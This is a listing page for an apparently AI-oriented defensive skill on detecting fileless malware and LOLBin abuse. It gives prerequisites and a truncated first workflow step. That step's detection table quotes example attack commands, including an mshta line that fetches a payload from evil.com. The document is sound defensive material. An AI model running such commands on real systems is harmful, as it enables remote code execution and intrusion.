detecting-fileless-malware-techniques

Featured

Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.

AI & Automation 12,642 stars 1468 forks Updated today Apache-2.0


Quality Score: 99/100

| Factor | Weight | Score |
|---|---|---|
| Stars | 20% | 100 |
| Recency | 20% | 100 |
| Frontmatter | 20% | 70 |
| Documentation | 15% | 100 |
| Issue Health | 10% | 50 |
| License | 10% | 100 |
| Description | 5% | 100 |

Skill Content

# Detecting Fileless Malware Techniques

## When to Use

- EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32)
- Investigating attacks that leave no traditional malware files on disk
- Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence
- Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments
- Memory forensics reveals malicious code but no corresponding files exist on the filesystem

**Do not use** for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware.

## Prerequisites

- Sysmon installed and configured with comprehensive logging (process creation, WMI events, registry changes)
- PowerShell Script Block Logging and Module Logging enabled
- Volatility 3 for memory forensics of fileless malware artifacts
- Process Monitor (ProcMon) for real-time system activity monitoring
- Windows Event Log access with adequate retention policies
- Autoruns for identifying persistence mechanisms

## Workflow

### Step 1: Identify LOLBin Usage

Detect abuse of legitimate Windows binaries for malicious purposes:

```
Commonly Abused LOLBins and Detection Patterns:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
mshta.exe:
  Abuse: Execute HTA files with embedded VBScript/JScript
  Example: mshta http://evil.com/payload.hta
  Example: mshta vbscript:Execute("CreateObject(""WScript...
```

Details

- Author: mukul975
- Repository: mukul975/Anthropic-Cybersecurity-Skills
- Created: 3 months ago
- Last Updated: today
- Language: Python
- License: Apache-2.0

Similar Skills

Semantically similar based on skill content — not just same category

AI & Automation Featured

detecting-living-off-the-land-attacks

Detect abuse of legitimate Windows binaries (LOLBins) used for living off the land attacks. Monitors process creation, command-line arguments, and parent-child relationships to identify suspicious LOLBin execution patterns.

12,642 Updated today
mukul975
AI & Automation Featured

detecting-fileless-attacks-on-endpoints

Detects fileless malware and in-memory attacks that execute entirely in RAM without writing persistent files to disk, evading traditional antivirus. Use when building detections for PowerShell-based attacks, reflective DLL injection, WMI persistence, and registry-resident malware. Activates for requests involving fileless malware detection, in-memory attacks, PowerShell exploitation, or living-off-the-land techniques.

12,642 Updated today
mukul975
AI & Automation Featured

hunting-for-living-off-the-land-binaries

Proactively hunt for adversary abuse of legitimate system binaries (LOLBins) to execute malicious payloads while evading detection.

12,642 Updated today
mukul975
AI & Automation Featured

hunting-for-lolbins-execution-in-endpoint-logs

Hunt for adversary abuse of Living Off the Land Binaries (LOLBins) by analyzing endpoint process creation logs for suspicious execution patterns of legitimate Windows system binaries used for malicious purposes.

12,642 Updated today
mukul975
AI & Automation Featured

detecting-living-off-the-land-with-lolbas

Detect Living Off the Land Binaries (LOLBins/LOLBAS) abuse including certutil, regsvr32, mshta, and rundll32 via process telemetry, Sigma rules, and parent-child process analysis

12,642 Updated today
mukul975